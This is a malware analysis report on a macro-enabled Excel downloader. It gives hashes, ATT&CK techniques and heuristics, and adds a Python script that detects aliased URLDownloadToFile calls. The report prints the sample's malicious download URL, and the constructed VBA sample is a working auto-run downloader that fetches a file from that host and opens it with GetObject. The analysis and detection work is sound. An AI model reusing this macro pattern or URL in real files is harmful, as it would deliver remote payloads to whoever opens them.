Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 990385a8773961b1…

MALICIOUS

Office (OOXML) / .XLSM

Size: 27.9 KB
Created: 2022-08-31 10:51:53 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2022-08-31
MD5: dbd3679d4767ab6c067d10a7e4ebd37c
SHA-1: 463816e7ef239f5d750034dd0e1cad6c0a6304b5
SHA-256: 990385a8773961b193753f5a0f48adeb0c8b57d639f2441369416112bb96b043
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_DOWNLOAD flags a use of URLDownloadToFile from VBA, the standard way for a macro to fetch a second-stage payload. The extracted VBA confirms it: the macro declares `allestimento` as an alias for the urlmon export URLDownloadToFileA (a renamed import, which keeps the API name out of a naive string search of the source) and calls it with a URL that only appears in clear after deobfuscation. The download target is 'https://pesyastoyatryam.com/10411611611211558P92C92o10197Q11512111611111410597m10846y99N111109', saved to a temporary file. Note that the path component is a long run of digits broken up by single letters rather than a file name; an analyst should check whether it is itself an encoded string (decimal character codes are a common VBA obfuscation) rather than a literal resource path. The report does not show the execution step, but the GetObject call flagged below is consistent with the macro opening or launching the downloaded file; treat the sample as a downloader whose final payload was not recovered here.
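The detection logic behind these heuristics is simple to reproduce on the decoded VBA source (the macros.bas artifact below). The script that follows is an added example, not code from the report or from the scanner that produced it: it resolves `Declare ... Alias` statements so that a renamed import such as `allestimento` is reported under its real export name, then flags calls to the resolved API, hard-coded URLs and late-bound object creation (GetObject/CreateObject/Shell). The VBA it runs on is a constructed stand-in that reproduces only the pattern the report describes (aliased URLDownloadToFileA, a URL literal, a GetObject call); the temp file name and the Workbook_Open procedure are assumptions, and the API watch-list is one I chose for the example.

```python
import re

# Windows APIs whose presence in a VBA Declare is a strong download / execution
# indicator. This watch-list is an assumption for the example; extend as needed.
SUSPICIOUS_APIS = {
    "URLDownloadToFileA": "OLE_VBA_DOWNLOAD",
    "URLDownloadToFileW": "OLE_VBA_DOWNLOAD",
    "ShellExecuteA": "OLE_VBA_EXEC",
    "ShellExecuteW": "OLE_VBA_EXEC",
    "WinExec": "OLE_VBA_EXEC",
    "CreateProcessA": "OLE_VBA_EXEC",
    "CreateProcessW": "OLE_VBA_EXEC",
}

# Declare [PtrSafe] Function|Sub <local> Lib "<dll>" [Alias "<export>"] (...)
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)
URL_RE = re.compile(r'"((?:https?|ftp)://[^"\s]+)"', re.IGNORECASE)
OBJ_RE = re.compile(r"\b(GetObject|CreateObject|Shell)\s*\(", re.IGNORECASE)

# Constructed sample, NOT the macro extracted from the analysed workbook.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function allestimento Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Workbook_Open()
    Dim u As String, t As String
    u = "https://pesyastoyatryam.com/10411611611211558P92C92o10197Q11512111611111410597m10846y99N111109"
    t = Environ("TEMP") & "\stage2.tmp"
    allestimento 0, u, t, 0, 0
    Set o = GetObject(t)
End Sub
'''


def resolve_declares(src):
    """Map each Declare'd local name to (dll, real export name).
    A renamed import via Alias is the usual way a macro hides URLDownloadToFile."""
    decl = {}
    for m in DECLARE_RE.finditer(src):
        local, dll, alias = m.group(1), m.group(2), m.group(3)
        decl[local] = (dll.lower(), alias or local)
    return decl


def triage_vba(src):
    """Return declares, (heuristic, line, detail) findings and URL literals."""
    lines = src.splitlines()
    decl = resolve_declares(src)
    findings = []
    # 1. Calls to aliased Windows APIs, reported under the real export name.
    for local, (dll, export) in decl.items():
        tag = SUSPICIOUS_APIS.get(export)
        if tag is None:
            continue
        call_re = re.compile(r"\b%s\b" % re.escape(local), re.IGNORECASE)
        for no, line in enumerate(lines, 1):
            # Skip the Declare line itself; only real call sites count.
            if call_re.search(line) and not DECLARE_RE.search(line):
                findings.append((tag, no, "%s -> %s!%s" % (local, dll, export)))
    # 2. Late-bound object creation or shell-out (VBA is case-insensitive).
    for no, line in enumerate(lines, 1):
        for m in OBJ_RE.finditer(line):
            tag = "OLE_VBA_GETOBJ" if m.group(1).lower() == "getobject" else "OLE_VBA_OBJ"
            findings.append((tag, no, m.group(1)))
    urls = sorted(set(URL_RE.findall(src)))
    return {"declares": decl, "findings": findings, "urls": urls}


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    for local, (dll, export) in result["declares"].items():
        print("declare %-14s -> %s!%s" % (local, dll, export))
    for tag, no, detail in result["findings"]:
        print("%-18s line %2d  %s" % (tag, no, detail))
    for url in result["urls"]:
        print("url", url)
```

Run it against the real macros.bas instead of SAMPLE_VBA (for example `triage_vba(open("macros.bas", errors="replace").read())`) and the aliased import shows up as `allestimento -> urlmon!URLDownloadToFileA` regardless of what the attacker named it. The URL regex only catches literals; a URL assembled from Chr() calls or concatenated fragments, which is what "deobfuscated" in the report implies, needs an emulation pass such as olevba's `--deobf` option on top of this.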

Heuristics (3)

  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile in VBA
  • OLE_VBA_GETOBJ (high): GetObject call
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains a VBA project, i.e. macros are present

Extracted artifacts (2)

Files carved from inside the sample during analysis.

macros.bas
  Kind:    vba-macro
  Source:  oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size:    2684 bytes
  SHA-256: e16effa28c9698beb5d891fceb0272e2a13ccfc94bf16bd8cd7430cb67d8efda

vbaProject_00.bin
  Kind:    vba-project
  Source:  OOXML VBA project: xl/vbaProject.bin
  Size:    21504 bytes
  SHA-256: 672511c72749b52dd43ba992ac10dc88f1d3d6f7cb63396155a54413a8d32770